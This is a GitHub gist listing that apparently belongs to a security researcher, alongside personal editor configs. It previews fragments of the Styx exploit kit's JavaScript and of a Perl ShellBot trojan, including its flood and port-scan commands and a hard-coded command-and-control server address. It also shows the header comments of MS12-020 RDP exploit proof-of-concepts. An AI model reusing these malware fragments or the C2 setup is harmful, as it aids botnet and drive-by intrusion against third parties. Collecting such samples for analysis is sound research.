I hereby claim:
- I am jamesejr on github.
- I am jamesejr (https://keybase.io/jamesejr) on keybase.
- I have a public key whose fingerprint is 4FD5 7133 4DE8 A421 59D3 8A32 6586 A1B1 A40C 39F4
To claim this, I am signing this object:
James Espinosa jamesejr
jamesejr
/ keybase.md
Created
October 3, 2014 05:35
GitHub identify proof for Keybase.io verification
jamesejr
/ styx_ek.js
Last active
August 29, 2015 13:55
A deobfuscated portion of the JavaScript code found on the Styx exploit kit
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function NyMpwEMG() { | |
| var FHQxrYhsp = window.PluginDetect.getVersion("Java"); | |
| if (typeof FHQxrYhsp == 'string') { | |
| FHQxrYhsp = FHQxrYhsp.split(","); | |
| if (FHQxrYhsp[3].length == 1) { | |
| FHQxrYhsp = "" + FHQxrYhsp[1] + "0" + FHQxrYhsp[3]; | |
| } else { | |
| FHQxrYhsp = "" + FHQxrYhsp[1] + FHQxrYhsp[3]; | |
| } | |
| } else { |
jamesejr
/ shellbot_a.pl
Last active
January 1, 2016 06:59
A snippet of the Perl/ShellBot.B Trojan variant script targeting phpMyAdmin
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/perl | |
| # ShellBOT | |
| # | |
| # Comenzi: !all | |
| # - @udp <ip> <port> <timp>; | |
| # - @fullportscan <ip> <start port> <final port>; | |
| # - !quit; | |
| # - !join <canal> <key> e !part <canal> <reason>; | |
| # - !op !deop !voice !devoice <canal> <nick>; | |
| # - !msg !ctcp 1 2; |
jamesejr
/ shellbot_b.pl
Last active
January 1, 2016 06:59
A snippet of the Perl/ShellBot.B Trojan variant script observed from ISC Diary
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/perl | |
| my @mast3rs = ("pizza"); | |
| my @hostauth = ("sosick.net"); | |
| my @admchan=("#X"); | |
| my @server = ("89.248.172.144"); | |
| $servidor= $server[rand scalar @server] unless $servidor; | |
| my $xeqt = "''"; |
jamesejr
/ .bash_profile
Created
December 7, 2013 23:29
Personal .bash_profile file used by the Ruby Version Manager (RVM)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Source our bashrc file, hacky? | |
| source ~/.bashrc | |
| export PATH=/usr/local/bin:$PATH | |
| # Load RVM into a shell session, as a function | |
| [[ -s "$HOME/.rvm/scripts/rvm" ]] && source "$HOME/.rvm/scripts/rvm" |
jamesejr
/ ruby-pack.txt
Created
August 25, 2013 18:56
A list of Ruby directives for 'pack' e.g. [1,2,3].pack("CCn") => "\x01\x02\x00\x03"
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Integer | Array | | |
| Directive | Element | Meaning | |
| --------------------------------------------------------------------------- | |
| C | Integer | 8-bit unsigned (unsigned char) | |
| S | Integer | 16-bit unsigned, native endian (uint16_t) | |
| L | Integer | 32-bit unsigned, native endian (uint32_t) | |
| Q | Integer | 64-bit unsigned, native endian (uint64_t) | |
| | | | |
| c | Integer | 8-bit signed (signed char) | |
| s | Integer | 16-bit signed, native endian (int16_t) |
jamesejr
/ ms12-020.rb
Created
August 24, 2013 23:16
MS12-020 Remote Desktop Protocol (RDP) Remote Code Execution PoC (Ruby)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env ruby | |
| # | |
| # ms12-020 PoC attempt | |
| # | |
| # NOTE: This was crafted based on a legit connection packet capture and reversing | |
| # a packet capture of the leaked MAPP PoC. | |
| # | |
| # by Joshua J. Drake (jduck) | |
| # |
jamesejr
/ ms12-020.py
Created
August 24, 2013 23:13
MS12-020 Remote Desktop Protocol (RDP) Remote Code Execution PoC (Python)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # | |
| # ms12-020 "chinese shit" PoC v2 (wireshark version) | |
| # | |
| # tested on winsp3 spanish, reported to work on Win7, win 2008 | |
| # | |
| # original source: http://115.com/file/be27pff7 | |
| # | |
| # |
jamesejr
/ .vimrc
Last active
December 18, 2015 22:39
— forked from todb-r7/.vimrc
Personal .vimrc file used for Metasploit Framework development
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| " If using Janus, then this should be .vimrc.after | |
| " Technically this is really a gvimrc but who's counting. | |
| set nocompatible | |
| colorscheme slate | |
| filetype plugin indent on | |
| set hls | |
| " Metasploit's current default tabs | |
| set tabstop=2 softtabstop=2 shiftwidth=2 noexpandtab shiftround smarttab |
jamesejr
/ sublime-settings
Last active
May 15, 2019 06:16
Personal customized Sublime Text 3 configuration file with Inconsolata font
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "bold_folder_labels": true, | |
| "caret_extra_width": 1, | |
| "caret_style": "phase", | |
| "close_windows_when_empty": false, | |
| "color_scheme": "Packages/Theme - Spacegray/base16-ocean.dark.tmTheme", | |
| "draw_minimap_border": true, | |
| "enable_tab_scrolling": false, | |
| "font_face": "Inconsolata", | |
| "font_options": |
NewerOlder